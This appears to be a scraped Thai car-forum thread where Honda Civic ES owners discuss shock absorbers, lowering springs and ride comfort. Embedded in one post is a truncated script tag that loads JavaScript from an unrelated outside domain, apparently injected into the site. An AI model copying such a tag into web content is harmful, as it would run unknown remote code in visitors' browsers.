ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  tukkang 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 22 มิถุนา 2012 20:50 - วิจัยโช้ค
pom_sawas พิมพ์ว่า:
EP3 Type R ลงตัวแล้วน่า พี่ว่าเปลี่ยนไปหาน้องๆนู๋ๆ มากช่วยบีบนวด เพิ่มดีกว่ามั้ย 55555555




มีแล้วพี่อันนั้นหลายคนด้วย555<script src="https://sport32news.com/civicesgroup.js"></
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 22 มิถุนา 2012 21:00 - วิจัยโช้ค
eskung พิมพ์ว่า:
NuuTeee พิมพ์ว่า:
eskung พิมพ์ว่า:
NuuTeee พิมพ์ว่า:
กำลังจะหาโช๊คนิ่ม ๆ เลยครับ 




ผมว่าถ้ามีถังแก๊สด้วยเซ็ตยากอยู่ครับพี่ นิ่มด้วย สวยด้วย เกาะด้วย ตอนนี้ลองใส่เดิมๆ ไม่มีอะแดปเตอร์ใดๆเลย ไฟหน้าส่องส่องรถสิบล้อหลบไปเลยครับ ถ้าเลื่อนเบ้าก็ต้องสปริงแต่ง เพราะสปริงเดิมมันยัน พอสปริงแต่งโช้คก็ต้องแข็งขึ้นเพราะไม่งั้นเดี๋ยวมันเด้ง
 สุดท้ายก็มาเข้าข้อเดิมอยู่ดี คือ เตี้ยแข็ง
เหนื่อยแล้วเนี่ยพี่



รถผมไม่มีถังแก๊สครับ

ตอนนี้ใส่สปริง RS-R กับโช๊คเดิมไป ปรากฏว่าสั่นสะท้านเลยครับ โช๊คเดิมรับแรงดีดของสปริงไม่อยู่

คิดอยู่ว่าจะเปลี่ยนเป็นโช๊คใหม่กับสปริง Tanabe NF210 ดีรึเปล่าครับ




ผมศึกษามาเค้าว่าลงตัวนะครับพี่เพราะค่า K มันใกล้เคียงกัน จัดเลยคร้าบพี่



พี่หมายถึงโช๊คเดิมกับ tanabe หรอครับ

เพื่อนผมใส่ ปรากฎว่านั่งหน้า 2 คน หลัง 3 คน เหมือนกับว่านิ่มจนโช๊คไม่ทำงานเลยครับ ขึ้นลูกระนาดไม่เด้งซักนิด ติดอยู่กับที่ตลอดเลย
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 22 มิถุนา 2012 21:16 - วิจัยโช้ค
ติดตามด้วยคนครับ  ที่จริงอยากให้ อัพ กระทู้ ต่อๆๆ ไปเรื่อยๆ ไม่อยากให้ ลบ แล้วโพสซ้ำ คอมเม้น แรกน่ะครับ จะได้เก็บเป็นข้อมูล ยาวๆๆๆ ต่อไปครับ จากวันที่ 1  ไป 2  ไป 3  ไป 4 จนเจอสูตรสำเร็จน่ะครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.